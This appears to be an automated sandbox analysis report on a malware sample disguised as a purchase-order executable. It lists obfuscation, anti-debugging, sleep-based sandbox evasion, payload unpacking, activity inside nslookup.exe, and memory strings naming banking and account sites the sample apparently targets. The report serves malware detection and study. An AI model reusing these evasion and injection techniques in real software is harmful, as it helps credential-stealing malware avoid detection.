        Source: Binary string: wntdll.pdb source: Purchase Order_20240528.exe, Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000005.00000003.2213210353.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2209385108.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp

        Data Obfuscation

        Source: Purchase Order_20240528.exe, Form1.cs.Net Code: InitializeComponent
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.cs.Net Code: ojexD5sK3l System.Reflection.Assembly.Load(byte[])
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.cs.Net Code: ojexD5sK3l System.Reflection.Assembly.Load(byte[])
        Source: 0.2.Purchase Order_20240528.exe.2815b80.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
        Source: 0.2.Purchase Order_20240528.exe.5280000.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.cs.Net Code: ojexD5sK3l System.Reflection.Assembly.Load(byte[])
        Source: 5.2.nslookup.exe.384cd08.2.raw.unpack, Form1.cs.Net Code: InitializeComponent
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_00E1CCB1 push 3800EABBh; retf 0_2_00E1CCBD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_00E19235 push ss; retf 0_2_00E19236
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015B225F pushad ; ret 3_2_015B27F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_015B27FA pushad ; ret 3_2_015B27F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_015E09AD push ecx; mov dword ptr [esp], ecx 3_2_015E09B6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_015B283D push eax; iretd 3_2_015B2858
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_00418367 push ss; retf 3_2_00418372
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_00418311 push ss; retf 3_2_00418372
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_00414446 pushfd ; ret 3_2_00414454
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_004087A1 push esp; iretd 3_2_004087C4
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0041A96D pushad ; retf 3_2_0041A96E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0041CC98 push ebx; retf 3_2_0041CCBB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0040CE71 push edx; iretd 3_2_0040CE7B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0040D5FC push ds; iretd 3_2_0040D60B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0040D641 push ds; iretd 3_2_0040D60B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0040D85E push 6594F3BCh; retf 3_2_0040D865
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_00407A78 push FFFFFFB4h; ret 3_2_00407A7C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_00413C15 push ecx; retf 4E5Bh 3_2_00413C31
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_00423D63 push eax; iretd 3_2_00423DB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_00417F65 push esp; retf 3_2_00417F8A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_00425F03 push ebx; iretd 3_2_00425FF9
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_0318225F pushad ; ret 5_2_031827F9
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031827FA pushad ; ret 5_2_031827F9
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_031B09AD push ecx; mov dword ptr [esp], ecx 5_2_031B09B6
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_0318283D push eax; iretd 5_2_03182858
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_0318135E push eax; iretd 5_2_03181369
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A70720 push eax; iretd 5_2_02A7076D
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A70712 push eax; iretd 5_2_02A7076D
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A54435 push FFFFFFB4h; ret 5_2_02A54439
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A605D2 push ecx; retf 4E5Bh 5_2_02A605EE
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A728C0 push ebx; iretd 5_2_02A729B6
        Source: Purchase Order_20240528.exe Static PE information: section name: .text entropy: 7.971095603069869
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\nslookup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Yara match File source: Process Memory Space: Purchase Order_20240528.exe PID: 1764, type: MEMORYSTR
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory allocated: E10000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory allocated: 27B0000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory allocated: 47B0000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory allocated: 8A80000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory allocated: 74C0000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory allocated: 9A80000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory allocated: AA80000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0162096E rdtsc 3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\nslookup.exe Window / User API: threadDelayed 9826
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe API coverage: 0.6 %
        Source: C:\Windows\SysWOW64\nslookup.exe API coverage: 2.3 %
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe TID: 4032 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\nslookup.exe TID: 1816 Thread sleep count: 147 > 30
        Source: C:\Windows\SysWOW64\nslookup.exe TID: 1816 Thread sleep time: -294000s >= -30000s
        Source: C:\Windows\SysWOW64\nslookup.exe TID: 1816 Thread sleep count: 9826 > 30
        Source: C:\Windows\SysWOW64\nslookup.exe TID: 1816 Thread sleep time: -19652000s >= -30000s
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664 Thread sleep time: -75000s >= -30000s
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664 Thread sleep count: 39 > 30
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664 Thread sleep time: -58500s >= -30000s
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664 Thread sleep count: 41 > 30
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664 Thread sleep time: -41000s >= -30000s
        Source: C:\Windows\SysWOW64\nslookup.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\nslookup.exe Code function: 5_2_02A6BD30 FindFirstFileW,FindNextFileW,FindClose, 5_2_02A6BD30
        Source: 7--93mK-.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
        Source: 7--93mK-.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
        Source: 7--93mK-.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
        Source: 7--93mK-.5.dr Binary or memory string: discord.comVMware20,11696487552f
        Source: 7--93mK-.5.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552#
        Source: 7--93mK-.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
        Source: 7--93mK-.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
        Source: 7--93mK-.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
        Source: 7--93mK-.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
        Source: 7--93mK-.5.dr Binary or memory string: global block list test formVMware20,11696487552
        Source: 7--93mK-.5.dr Binary or memory string: tasks.office.comVMware20,11696487552o
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e365.comVMware20,11696487552t
        Source: 7--93mK-.5.dr Binary or memory string: AMC password management pageVMware20,11696487552
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: 7--93mK-.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
        Source: 7--93mK-.5.dr Binary or memory string: dev.azure.comVMware20,11696487552j
        Source: 7--93mK-.5.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
        Source: 7--93mK-.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
        Source: 7--93mK-.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
        Source: 7--93mK-.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
        Source: 7--93mK-.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
        Source: 7--93mK-.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.intuit.comVMware20,11696487552t
        Source: 7--93mK-.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
        Source: 7--93mK-.5.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
        Source: 7--93mK-.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
        Source: 7--93mK-.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
        Source: 7--93mK-.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,1_
        Source: 7--93mK-.5.dr Binary or memory string: outlook.office.comVMware20,11696487552s
        Source: 7--93mK-.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
        Source: 7--93mK-.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
        Source: 7--93mK-.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tportal.hdfcbank.comVMware20,11696487552
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4538062090.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
        Source: 7--93mK-.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
        Source: 7--93mK-.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
        Source: firefox.exe, 00000009.00000002.2514682215.000001F10F10F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHH
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\nslookup.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_0162096E rdtsc 3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_01622B60 NtClose,LdrInitializeThunk, 3_2_01622B60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Code function: 3_2_015E6154 mov eax, dword ptr fs:[00000030h] 3_2_015E6154
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E65D0 mov eax, dword ptr fs:[00000030h]3_2_015E65D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E5CF mov eax, dword ptr fs:[00000030h]3_2_0161E5CF
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E5CF mov eax, dword ptr fs:[00000030h]3_2_0161E5CF
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A5D0 mov eax, dword ptr fs:[00000030h]3_2_0161A5D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A5D0 mov eax, dword ptr fs:[00000030h]3_2_0161A5D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E25E0 mov eax, dword ptr fs:[00000030h]3_2_015E25E0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016605A7 mov eax, dword ptr fs:[00000030h]3_2_016605A7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016605A7 mov eax, dword ptr fs:[00000030h]3_2_016605A7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016605A7 mov eax, dword ptr fs:[00000030h]3_2_016605A7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016045B1 mov eax, dword ptr fs:[00000030h]3_2_016045B1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016045B1 mov eax, dword ptr fs:[00000030h]3_2_016045B1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E2582 mov eax, dword ptr fs:[00000030h]3_2_015E2582
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E2582 mov ecx, dword ptr fs:[00000030h]3_2_015E2582
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01614588 mov eax, dword ptr fs:[00000030h]3_2_01614588
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E59C mov eax, dword ptr fs:[00000030h]3_2_0161E59C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D645D mov eax, dword ptr fs:[00000030h]3_2_015D645D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C460 mov ecx, dword ptr fs:[00000030h]3_2_0166C460
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160A470 mov eax, dword ptr fs:[00000030h]3_2_0160A470
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160A470 mov eax, dword ptr fs:[00000030h]3_2_0160A470
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160A470 mov eax, dword ptr fs:[00000030h]3_2_0160A470
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160245A mov eax, dword ptr fs:[00000030h]3_2_0160245A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169A456 mov eax, dword ptr fs:[00000030h]3_2_0169A456
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A430 mov eax, dword ptr fs:[00000030h]3_2_0161A430
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01618402 mov eax, dword ptr fs:[00000030h]3_2_01618402
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01618402 mov eax, dword ptr fs:[00000030h]3_2_01618402
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01618402 mov eax, dword ptr fs:[00000030h]3_2_01618402
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DC427 mov eax, dword ptr fs:[00000030h]3_2_015DC427
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE420 mov eax, dword ptr fs:[00000030h]3_2_015DE420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE420 mov eax, dword ptr fs:[00000030h]3_2_015DE420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE420 mov eax, dword ptr fs:[00000030h]3_2_015DE420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E04E5 mov ecx, dword ptr fs:[00000030h]3_2_015E04E5
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016144B0 mov ecx, dword ptr fs:[00000030h]3_2_016144B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166A4B0 mov eax, dword ptr fs:[00000030h]3_2_0166A4B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169A49A mov eax, dword ptr fs:[00000030h]3_2_0169A49A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E64AB mov eax, dword ptr fs:[00000030h]3_2_015E64AB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0750 mov eax, dword ptr fs:[00000030h]3_2_015E0750
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161674D mov esi, dword ptr fs:[00000030h]3_2_0161674D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161674D mov eax, dword ptr fs:[00000030h]3_2_0161674D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161674D mov eax, dword ptr fs:[00000030h]3_2_0161674D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E8770 mov eax, dword ptr fs:[00000030h]3_2_015E8770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622750 mov eax, dword ptr fs:[00000030h]3_2_01622750
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622750 mov eax, dword ptr fs:[00000030h]3_2_01622750
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01664755 mov eax, dword ptr fs:[00000030h]3_2_01664755
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E75D mov eax, dword ptr fs:[00000030h]3_2_0166E75D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C720 mov eax, dword ptr fs:[00000030h]3_2_0161C720
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C720 mov eax, dword ptr fs:[00000030h]3_2_0161C720
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0710 mov eax, dword ptr fs:[00000030h]3_2_015E0710
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165C730 mov eax, dword ptr fs:[00000030h]3_2_0165C730
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161273C mov eax, dword ptr fs:[00000030h]3_2_0161273C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161273C mov ecx, dword ptr fs:[00000030h]3_2_0161273C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161273C mov eax, dword ptr fs:[00000030h]3_2_0161273C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C700 mov eax, dword ptr fs:[00000030h]3_2_0161C700
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01610710 mov eax, dword ptr fs:[00000030h]3_2_01610710
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E7E1 mov eax, dword ptr fs:[00000030h]3_2_0166E7E1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016027ED mov eax, dword ptr fs:[00000030h]3_2_016027ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016027ED mov eax, dword ptr fs:[00000030h]3_2_016027ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016027ED mov eax, dword ptr fs:[00000030h]3_2_016027ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EC7C0 mov eax, dword ptr fs:[00000030h]3_2_015EC7C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E47FB mov eax, dword ptr fs:[00000030h]3_2_015E47FB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E47FB mov eax, dword ptr fs:[00000030h]3_2_015E47FB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016607C3 mov eax, dword ptr fs:[00000030h]3_2_016607C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016947A0 mov eax, dword ptr fs:[00000030h]3_2_016947A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168678E mov eax, dword ptr fs:[00000030h]3_2_0168678E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E07AF mov eax, dword ptr fs:[00000030h]3_2_015E07AF
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A660 mov eax, dword ptr fs:[00000030h]3_2_0161A660
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A660 mov eax, dword ptr fs:[00000030h]3_2_0161A660
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A866E mov eax, dword ptr fs:[00000030h]3_2_016A866E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A866E mov eax, dword ptr fs:[00000030h]3_2_016A866E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01612674 mov eax, dword ptr fs:[00000030h]3_2_01612674
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FC640 mov eax, dword ptr fs:[00000030h]3_2_015FC640
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01616620 mov eax, dword ptr fs:[00000030h]3_2_01616620
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01618620 mov eax, dword ptr fs:[00000030h]3_2_01618620
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E609 mov eax, dword ptr fs:[00000030h]3_2_0165E609
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E262C mov eax, dword ptr fs:[00000030h]3_2_015E262C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE627 mov eax, dword ptr fs:[00000030h]3_2_015FE627
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622619 mov eax, dword ptr fs:[00000030h]3_2_01622619
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E6F2 mov eax, dword ptr fs:[00000030h]3_2_0165E6F2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E6F2 mov eax, dword ptr fs:[00000030h]3_2_0165E6F2
